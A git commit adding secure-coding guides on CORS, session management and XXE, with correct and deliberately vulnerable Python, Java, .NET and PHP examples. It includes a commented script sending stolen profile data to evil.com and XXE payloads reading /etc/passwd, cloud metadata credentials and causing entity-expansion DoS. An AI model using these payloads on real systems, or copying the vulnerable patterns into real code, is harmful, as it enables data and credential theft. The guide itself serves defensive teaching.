Add session management, CORS, XXE patterns

Complete the security patterns collection:

- session-management.md: fixation, hijacking, secure cookies, concurrent sessions
- cors.md: origin validation, reflected origin attacks, preflight caching
- xxe.md: external entities, DTD attacks, language-specific fixes

Now 19 patterns covering comprehensive web application security.
2026-05-10 23:20:36 -07:00
parent 5b9f30e663
commit 17c535bc61
4 changed files with 556 additions and 4 deletions
@@ -20,13 +20,14 @@ Based on OWASP Top 10:2025 and recent security research.
 | [audit-logging.md](audit-logging.md) | What to log, what not to log | A09 |
 | [error-handling.md](error-handling.md) | Fail closed, no sensitive info in errors | A10 |
-### Identity
+### Identity & Session
 | File | Topic | OWASP 2025 |
 |------|-------|------------|
 | [authentication.md](authentication.md) | Passwords, tokens, MFA, brute force protection | A07 |
 | [authorization.md](authorization.md) | Permission checks, IDOR prevention, privilege escalation | A01 |
 | [jwt-security.md](jwt-security.md) | Algorithm confusion, weak secrets, expiration | A07 |
 | [session-management.md](session-management.md) | Session fixation, hijacking, secure cookies | A07 |
 ### Attack Prevention
@@ -34,10 +35,12 @@ Based on OWASP Top 10:2025 and recent security research.
 |------|-------|------------|
 | [injection-prevention.md](injection-prevention.md) | SQL, command, template, path traversal | A05 |
 | [ssrf.md](ssrf.md) | Server-side request forgery, metadata endpoints | A10 |
 | [xxe.md](xxe.md) | XML external entities, DTD attacks | A05 |
 | [dos-prevention.md](dos-prevention.md) | Rate limiting, resource bounds, algorithmic complexity | — |
 | [prompt-injection.md](prompt-injection.md) | LLM security, data/instruction separation | — |
 | [deserialization.md](deserialization.md) | Untrusted data deserialization, pickle, yaml | A08 |
 | [race-conditions.md](race-conditions.md) | TOCTOU, atomic check-and-act, database locks | — |
 | [cors.md](cors.md) | Origin validation, credential handling | A01 |
 ### Infrastructure
@@ -50,13 +53,13 @@ Based on OWASP Top 10:2025 and recent security research.
 | # | Category | Pattern |
 |---|----------|---------|
-| A01 | Broken Access Control | authorization.md |
+| A01 | Broken Access Control | authorization.md, cors.md |
 | A02 | Security Misconfiguration | secure-defaults.md |
 | A03 | Software Supply Chain Failures | supply-chain.md |
 | A04 | Cryptographic Failures | cryptography.md |
-| A05 | Injection | injection-prevention.md |
+| A05 | Injection | injection-prevention.md, xxe.md |
 | A06 | Insecure Design | secure-defaults.md |
-| A07 | Authentication Failures | authentication.md, jwt-security.md |
+| A07 | Authentication Failures | authentication.md, jwt-security.md, session-management.md |
 | A08 | Software or Data Integrity Failures | deserialization.md |
 | A09 | Security Logging and Alerting Failures | audit-logging.md |
 | A10 | Mishandling of Exceptional Conditions | error-handling.md, ssrf.md |
@@ -0,0 +1,183 @@
 # CORS Misconfiguration
 ## Rule
 Never reflect Origin blindly. Allowlist specific origins. Don't use credentials with wildcards.
 **Source:** [OWASP Cross-Site Request Forgery Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
 ## CORS Basics
 By default, the browser's same-origin policy stops scripts from reading cross-origin responses. CORS headers selectively relax that restriction:
 | Header | Purpose |
 |--------|---------|
 | `Access-Control-Allow-Origin` | Which origins can access |
 | `Access-Control-Allow-Credentials` | Allow cookies/auth |
 | `Access-Control-Allow-Methods` | Allowed HTTP methods |
 | `Access-Control-Allow-Headers` | Allowed request headers |
 ## Correct Pattern
 ```python
 from flask import Flask, make_response, request
 app = Flask(__name__)
 ALLOWED_ORIGINS = {
    "https://app.example.com",
    "https://admin.example.com",
 }
 def add_cors_headers(response):
    origin = request.headers.get("Origin")
    # Validate against allowlist
    if origin in ALLOWED_ORIGINS:
        response.headers["Access-Control-Allow-Origin"] = origin
        response.headers["Access-Control-Allow-Credentials"] = "true"
        response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
        response.headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization"
        response.headers["Vary"] = "Origin"  # Important for caching!
    return response
 # For public APIs without credentials
 def add_public_cors(response):
    response.headers["Access-Control-Allow-Origin"] = "*"
    # Note: credentials CANNOT be used with wildcard
    response.headers["Access-Control-Allow-Methods"] = "GET"
    return response
 # Handle preflight requests
@app.route("/api/<path:path>", methods=["OPTIONS"])
 def preflight(path):
    response = make_response()
    return add_cors_headers(response)
 ```
 ## Incorrect Pattern
 ```python
 # Wrong: reflect any origin (allows any site to access)
@app.after_request
 def bad_cors(response):
    origin = request.headers.get("Origin")
    response.headers["Access-Control-Allow-Origin"] = origin  # Reflected!
    response.headers["Access-Control-Allow-Credentials"] = "true"
    return response
    # Attack: evil.com can now make authenticated requests
 # Wrong: wildcard with credentials
 response.headers["Access-Control-Allow-Origin"] = "*"
 response.headers["Access-Control-Allow-Credentials"] = "true"
 # Browser will reject, but shows misunderstanding
 # Wrong: suffix match without a dot boundary
 def check_origin(origin):
    return origin.endswith("example.com")
    # Bypassed by: https://attacker-example.com
 # Wrong: null origin allowed
 ALLOWED_ORIGINS = {"https://app.example.com", "null"}
 # "null" origin sent by sandboxed iframes, file:// URLs - attacker controlled!
 # Wrong: substring match
 def check_origin(origin):
    return "example.com" in origin
    # Bypassed by: example.com.evil.com
 ```
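The bypasses named in the comments above can be checked directly. The following is a minimal sketch using only the standard library; the helper names (`suffix_check`, `substring_check`, `exact_check`) are hypothetical and exist only for this comparison.

```python
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}


def suffix_check(origin: str) -> bool:
    # Naive: any origin that merely ends with the string passes.
    return origin.endswith("example.com")


def substring_check(origin: str) -> bool:
    # Naive: the string may appear anywhere in the origin.
    return "example.com" in origin


def exact_check(origin: str) -> bool:
    # Strict: the full origin (scheme + host) must be on the allowlist.
    return origin in ALLOWED_ORIGINS


if __name__ == "__main__":
    candidates = (
        "https://app.example.com",
        "https://attacker-example.com",
        "https://example.com.evil.com",
        "null",
    )
    for candidate in candidates:
        print(
            candidate,
            suffix_check(candidate),
            substring_check(candidate),
            exact_check(candidate),
        )
```

Only the exact allowlist comparison rejects both attacker-controlled origins while still accepting the legitimate one.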
 ## Origin Validation
 ```python
 from urllib.parse import urlparse
 ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}
 def is_valid_origin(origin: str) -> bool:
    """Strict origin validation."""
    if not origin:
        return False
    # Never allow null
    if origin == "null":
        return False
    # Exact match against allowlist
    if origin in ALLOWED_ORIGINS:
        return True
    # If you need subdomain matching, be careful:
    try:
        parsed = urlparse(origin)
        # Must be HTTPS
        if parsed.scheme != "https":
            return False
        # Exact domain match (not suffix!)
        allowed_domains = {"app.example.com", "admin.example.com"}
        if parsed.netloc in allowed_domains:
            return True
        # Subdomain of specific parent (careful!)
        if parsed.netloc.endswith(".trusted.example.com"):
            # Verify it's actually a subdomain, not suffix attack
            parts = parsed.netloc.split(".")
            if len(parts) >= 4 and parts[-3:] == ["trusted", "example", "com"]:
                return True
    except Exception:
        return False
    return False
 ```
 ## Attack Scenarios
 ```python
 # Scenario 1: Data theft via reflected origin
 # 
 # Vulnerable server reflects any Origin with credentials
 # 
 # Attacker's evil.com:
 # <script>
 # fetch("https://api.victim.com/user/profile", {
 #     credentials: "include"
 # })
 # .then(r => r.json())
 # .then(data => {
 #     // Send stolen data to attacker
 #     fetch("https://evil.com/steal?data=" + JSON.stringify(data))
 # })
 # </script>
 # Scenario 2: CSRF via CORS
 #
 # If CORS allows credentials from evil.com,
 # evil.com can make authenticated state-changing requests
 ```
 ## Preflight Caching
 ```python
@app.after_request
 def cors_headers(response):
    origin = request.headers.get("Origin")
    if origin in ALLOWED_ORIGINS:
        response.headers["Access-Control-Allow-Origin"] = origin
        response.headers["Access-Control-Allow-Credentials"] = "true"
        response.headers["Access-Control-Max-Age"] = "86400"  # Cache preflight up to 24h (browsers cap this, e.g. Chromium at 2h)
        response.headers["Vary"] = "Origin"  # CRITICAL for caching
    return response
 # Why Vary: Origin matters:
 # Without it, CDN might cache response for origin A
 # Then serve that cached response to origin B (wrong ACAO header!)
 ```
 ## Edge Cases
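 - WebSocket connections don't use CORS (check the Origin header manually during the handshake)
 - `Access-Control-Expose-Headers` needed for custom response headers
 - Preflight not sent for "simple" requests (GET, HEAD, or POST with only safelisted headers and a form or plain-text Content-Type), so the server still processes them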
 - Internal APIs should still validate Origin (defense in depth)
 - Browser extensions can bypass CORS (not a vulnerability)
 - Server-to-server requests don't involve CORS
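
Because WebSocket handshakes are not covered by CORS, the Origin check has to be done by hand. The sketch below is framework-agnostic and assumes the handshake headers are available as a plain mapping; `ALLOWED_WS_ORIGINS` and `websocket_origin_allowed` are hypothetical names, and rejecting clients that send no Origin at all is a policy choice rather than a requirement.

```python
from typing import Mapping

# Hypothetical allowlist for this sketch.
ALLOWED_WS_ORIGINS = frozenset({"https://app.example.com"})


def websocket_origin_allowed(headers: Mapping[str, str]) -> bool:
    """Return True only if the handshake's Origin is on the allowlist."""
    # Header names are case-insensitive, so normalise them before lookup.
    normalised = {name.lower(): value for name, value in headers.items()}
    origin = normalised.get("origin")
    # A missing Origin (non-browser client) and "null" are both rejected.
    return origin is not None and origin in ALLOWED_WS_ORIGINS
```

Call it before accepting the upgrade and close the connection when it returns `False`.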
@@ -0,0 +1,185 @@
 # Session Management
 ## Rule
 Generate unpredictable session IDs. Bind sessions to users. Expire aggressively. Regenerate on privilege change.
 **Source:** [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)
 ## Session Attacks
 | Attack | Description | Defense |
 |--------|-------------|---------|
 | Session fixation | Attacker sets victim's session ID | Regenerate on login |
 | Session hijacking | Steal session via XSS/network | httpOnly, Secure flags |
 | Session prediction | Guess valid session IDs | Cryptographic randomness |
 | Session replay | Reuse captured session | Short expiration, binding |
 ## Correct Pattern
 ```python
 import secrets
 from datetime import datetime, timedelta
 from flask import session, request
 # Generate cryptographically secure session ID
 def generate_session_id() -> str:
    return secrets.token_urlsafe(32)  # 256 bits of entropy
 # Session configuration
 SESSION_CONFIG = {
    "cookie_name": "__Host-session",  # __Host- prefix enforces Secure + no Domain
    "httponly": True,      # Not accessible to JavaScript
    "secure": True,        # HTTPS only
    "samesite": "Lax",     # CSRF protection
    "max_age": 3600,       # 1 hour max
 }
 # Regenerate session on privilege change
 def login(user: User, password: str) -> bool:
    if not verify_password(user, password):
        return False
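    # CRITICAL: regenerate session ID to prevent fixation.
    # Note: Flask's built-in session has no regenerate(); this call stands in
    # for your session backend's ID-rotation method.
    session.regenerate()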
    session["user_id"] = user.id
    session["login_time"] = datetime.utcnow().isoformat()
    session["ip"] = request.remote_addr
    session["user_agent"] = request.user_agent.string
    return True
 def logout():
    # Invalidate server-side, not just client cookie
    session_id = session.get("_id")
    if session_id:
        invalidate_session_server_side(session_id)
    session.clear()
 # Validate session binding
 def validate_session() -> bool:
    if "user_id" not in session:
        return False
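    # Check absolute session age; a missing or malformed timestamp fails closed
    try:
        login_time = datetime.fromisoformat(session["login_time"])
    except (KeyError, TypeError, ValueError):
        logout()
        return False
    if datetime.utcnow() - login_time > timedelta(hours=8):
        logout()
        return False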
    # Optional: bind to IP (careful with mobile/proxies)
    # if session.get("ip") != request.remote_addr:
    #     logout()
    #     return False
    return True
 ```
 ## Incorrect Pattern
 ```python
 import random
 import hashlib
 # Wrong: predictable session ID
 def bad_session_id():
    return str(random.randint(1000000, 9999999))
 # Wrong: sequential session ID
 COUNTER = 0
 def bad_session_id_2():
    global COUNTER
    COUNTER += 1
    return str(COUNTER)
 # Wrong: user-derived session ID
 def bad_session_id_3(user_id):
    return hashlib.md5(str(user_id).encode()).hexdigest()
 # Wrong: no regeneration on login (session fixation)
 def bad_login(user, password):
    if verify_password(user, password):
        session["user_id"] = user.id  # Same session ID!
        return True
    return False
 # Wrong: client-side only logout
 def bad_logout():
    response = redirect("/")
    response.delete_cookie("session")  # Only removes the browser's copy
    return response
    # Session still valid server-side!
 # Wrong: missing cookie security flags
 app.config["SESSION_COOKIE_HTTPONLY"] = False  # XSS can steal
 app.config["SESSION_COOKIE_SECURE"] = False    # Sent over HTTP
 ```
 ## Session Fixation Attack
 ```python
 # Attack scenario:
 # 1. Attacker visits site, gets session ID "abc123"
 # 2. Attacker sends victim link: https://site.com/?sessionid=abc123
 # 3. Victim clicks, their browser now uses "abc123"
 # 4. Victim logs in (session ID unchanged!)
 # 5. Attacker uses "abc123" - now authenticated as victim
 # Defense: ALWAYS regenerate on login
@app.route("/login", methods=["POST"])
 def login():
    if authenticate(request.form):
        session.regenerate()  # New session ID
        session["authenticated"] = True
    return redirect("/")
 ```
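
What "regenerate" means depends on the session backend. As a rough illustration, the sketch below uses a hypothetical in-memory store (`InMemorySessionStore` is not a Flask or library class): the session data moves to a fresh random ID and the old ID stops resolving, so an ID planted by an attacker is useless after login.

```python
import secrets
from typing import Dict, Optional


class InMemorySessionStore:
    """Hypothetical store used only to illustrate ID rotation."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def create(self) -> str:
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = {}
        return session_id

    def get(self, session_id: str) -> Optional[dict]:
        return self._sessions.get(session_id)

    def regenerate(self, old_id: str) -> str:
        """Move session data to a fresh ID and invalidate the old one."""
        data = self._sessions.pop(old_id, {})
        new_id = secrets.token_urlsafe(32)
        self._sessions[new_id] = data
        return new_id


if __name__ == "__main__":
    store = InMemorySessionStore()
    planted_id = store.create()               # ID the attacker knows
    fresh_id = store.regenerate(planted_id)   # called on successful login
    store.get(fresh_id)["user_id"] = 42
    print(store.get(planted_id))              # the planted ID no longer resolves
```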
 ## Concurrent Session Control
 ```python
 # Limit active sessions per user
 MAX_SESSIONS_PER_USER = 3
 def create_session(user_id: str) -> str:
    # Get existing sessions
    existing = Session.query.filter_by(user_id=user_id).order_by(
        Session.created_at.asc()
    ).all()
    # Remove oldest sessions until there is room for the new one
    excess = len(existing) - MAX_SESSIONS_PER_USER + 1
    for oldest in existing[:max(excess, 0)]:
        oldest.delete()
        # Optionally notify user: "Logged out of oldest session"
    # Create new session
    session_id = generate_session_id()
    Session.create(
        id=session_id,
        user_id=user_id,
        created_at=datetime.utcnow(),
        ip=request.remote_addr
    )
    return session_id
 # Allow user to view/revoke sessions
@app.route("/settings/sessions")
 def list_sessions():
    sessions = Session.query.filter_by(user_id=current_user.id).all()
    return render_template("sessions.html", sessions=sessions)
@app.route("/settings/sessions/<session_id>/revoke", methods=["POST"])
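 def revoke_session(session_id):
    # Named "target" to avoid shadowing Flask's global `session`
    target = Session.query.get(session_id)
    # Ownership check prevents revoking another user's session (IDOR)
    if target and target.user_id == current_user.id:
        target.delete()
    return redirect("/settings/sessions")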
 ```
 ## Edge Cases
 - Mobile apps: use short-lived access tokens, not sessions
 - "Remember me": separate long-lived token, not extended session
 - Password change should invalidate all other sessions
 - Admin impersonation needs audit trail
 - Idle timeout vs absolute timeout (both needed)
 - Session data size limits (don't store large objects)
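
The idle versus absolute timeout point can be sketched as a single check. This assumes the server records a creation time and a last-activity time for each session; the function name and the 30-minute idle value are assumptions for illustration, while the 8-hour absolute limit mirrors the value used in the correct pattern.

```python
from datetime import datetime, timedelta, timezone
from typing import Optional

IDLE_TIMEOUT = timedelta(minutes=30)    # assumed value for this sketch
ABSOLUTE_TIMEOUT = timedelta(hours=8)   # matches the 8-hour check in the correct pattern


def session_expired(
    created_at: datetime,
    last_seen_at: datetime,
    now: Optional[datetime] = None,
) -> bool:
    """Return True if either the absolute or the idle timeout has passed."""
    now = now or datetime.now(timezone.utc)
    # Absolute timeout: caps total session lifetime even for active users.
    if now - created_at > ABSOLUTE_TIMEOUT:
        return True
    # Idle timeout: ends sessions that have seen no recent activity.
    if now - last_seen_at > IDLE_TIMEOUT:
        return True
    return False
```

Both timestamps should be timezone-aware and stored server-side, so a client cannot extend its own session.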
@@ -0,0 +1,181 @@
 # XML External Entities (XXE)
 ## Rule
 Disable external entity processing. Disable DTDs. Use safe parser defaults.
 **Source:** [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
 ## What XXE Can Do
 - **File disclosure**: Read `/etc/passwd`, config files, source code
 - **SSRF**: Make requests to internal services
 - **DoS**: Billion laughs attack (exponential entity expansion)
 - **Port scanning**: Error-based probing of internal ports
 - **RCE**: In some configurations (PHP expect://)
 ## Attack Payloads
 ```xml
 <!-- File disclosure -->
 <?xml version="1.0"?>
 <!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
 ]>
 <data>&xxe;</data>
 <!-- SSRF to cloud metadata -->
 <?xml version="1.0"?>
 <!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
 ]>
 <data>&xxe;</data>
 <!-- Billion laughs DoS -->
 <?xml version="1.0"?>
 <!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- ... continues exponentially -->
 ]>
 <lolz>&lol9;</lolz>
 ```
 ## Correct Pattern
 ```python
 # Python - defusedxml (recommended)
 import defusedxml.ElementTree as ET
 def parse_xml_safe(xml_string: str):
    """Parse XML with XXE protection."""
    return ET.fromstring(xml_string)
 # Python - standard library (verify behavior for your version)
 import xml.etree.ElementTree as StdET  # separate alias so defusedxml's ET above is not shadowed
 def parse_xml_manual(xml_string: str):
    """Standard-library parse; prefer defusedxml for untrusted input."""
    parser = StdET.XMLParser()
    # ElementTree doesn't resolve external entities by default, but it can
    # still be exposed to entity-expansion DoS on older Expat builds.
    # Always verify your specific library!
    return StdET.fromstring(xml_string, parser=parser)
 # lxml with safe settings
 from lxml import etree
 def parse_xml_lxml(xml_string: str):
    """lxml with XXE disabled."""
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        dtd_validation=False,
        load_dtd=False,
    )
    return etree.fromstring(xml_string.encode(), parser=parser)
 ```
 ## Incorrect Pattern
 ```python
 from lxml import etree
 # Wrong: relying on lxml defaults (versions before 5.0 resolve external file entities)
 def bad_parse(xml_string: str):
    return etree.fromstring(xml_string)
 # Wrong: explicitly enabling dangerous features
 def bad_parse_2(xml_string: str):
    parser = etree.XMLParser(resolve_entities=True)
    return etree.fromstring(xml_string, parser=parser)
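 # Wrong: using xml.dom.minidom on untrusted input
 from xml.dom.minidom import parseString
 def bad_parse_3(xml_string: str):
    return parseString(xml_string)  # No external entities, but entity-expansion DoS is possible
 # Wrong: SAX parser without disabling features
 import xml.sax
 from xml.sax.handler import ContentHandler
 def bad_parse_4(xml_string: str):
    handler = ContentHandler()  # stand-in for your own handler
    # Python < 3.7.1 processes external general entities here by default
    xml.sax.parseString(xml_string, handler)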
 ```
 ## Language-Specific Fixes
 ### Java
 ```java
 // DocumentBuilderFactory
 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
 dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
 dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
 dbf.setXIncludeAware(false);
 dbf.setExpandEntityReferences(false);
 // SAXParserFactory
 SAXParserFactory spf = SAXParserFactory.newInstance();
 spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
 spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
 spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
 ```
 ### .NET
 ```csharp
 // XmlReader (safe by default in .NET 4.5.2+)
 XmlReaderSettings settings = new XmlReaderSettings();
 settings.DtdProcessing = DtdProcessing.Prohibit;
 settings.XmlResolver = null;
 XmlReader reader = XmlReader.Create(stream, settings);
 // XmlDocument
 XmlDocument doc = new XmlDocument();
 doc.XmlResolver = null;  // Disable external resources
 doc.LoadXml(xmlString);
 ```
 ### PHP
 ```php
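 // PHP < 8.0: disable external entity loading globally
 // (deprecated in PHP 8.0, where libxml >= 2.9.0 disables it by default)
 libxml_disable_entity_loader(true);
 // Wrong: LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD loads external DTDs
 // $doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);
 // Correct: omit those flags and block network access
 $doc = new DOMDocument();
 $doc->loadXML($xml, LIBXML_NONET);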
 ```
 ## When You Need DTDs
 ```python
 # If you absolutely need DTD validation (rare):
 # 1. Allowlist specific DTDs
 # 2. Fetch DTDs from local filesystem only
 # 3. Never allow user-controlled DTD URLs
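 from lxml import etree
 ALLOWED_DTDS = {
    "-//W3C//DTD XHTML 1.0 Strict//EN": "/path/to/local/xhtml1-strict.dtd"
 }
 class SafeResolver(etree.Resolver):
    def resolve(self, system_url, public_id, context):
        if public_id in ALLOWED_DTDS:
            return self.resolve_filename(ALLOWED_DTDS[public_id], context)
        raise ValueError(f"DTD not allowed: {public_id}")
 # Register the resolver on the parser that loads DTDs
 parser = etree.XMLParser(load_dtd=True, no_network=True, resolve_entities=False)
 parser.resolvers.add(SafeResolver())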
 ```
 ## Edge Cases
 - SVG files are XML — validate uploads!
 - SOAP/XML-RPC endpoints are XXE targets
 - Office documents (DOCX, XLSX) contain XML
 - Configuration files (Maven pom.xml, Spring beans.xml)
 - RSS/Atom feeds
 - SAML assertions
 - Blind XXE (out-of-band data exfiltration via DNS/HTTP)
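
For upload and feed handlers like the ones listed above, one conservative option is to reject any document that declares a DOCTYPE before parsing it properly. The sketch below uses only the standard library; `DTDForbidden` and `parse_xml_no_dtd` are hypothetical names, and the approach assumes the application never needs DTDs. It parses the input twice, which is acceptable for a sketch but worth revisiting for large documents.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a document declares a DOCTYPE."""


def _forbid_doctype(name, system_id, public_id, has_internal_subset):
    # Expat calls this at the start of a DOCTYPE, before any entity is expanded.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_xml_no_dtd(data: bytes) -> ET.Element:
    """Parse XML, refusing any document that contains a DOCTYPE declaration."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _forbid_doctype
    # First pass: raises DTDForbidden, or expat.ExpatError for malformed input.
    checker.Parse(data, True)
    # Second pass: build the tree only after the document passed the check.
    return ET.fromstring(data)
```

A maintained library such as defusedxml remains the better choice where it is available; this only illustrates the "disable DTDs" rule.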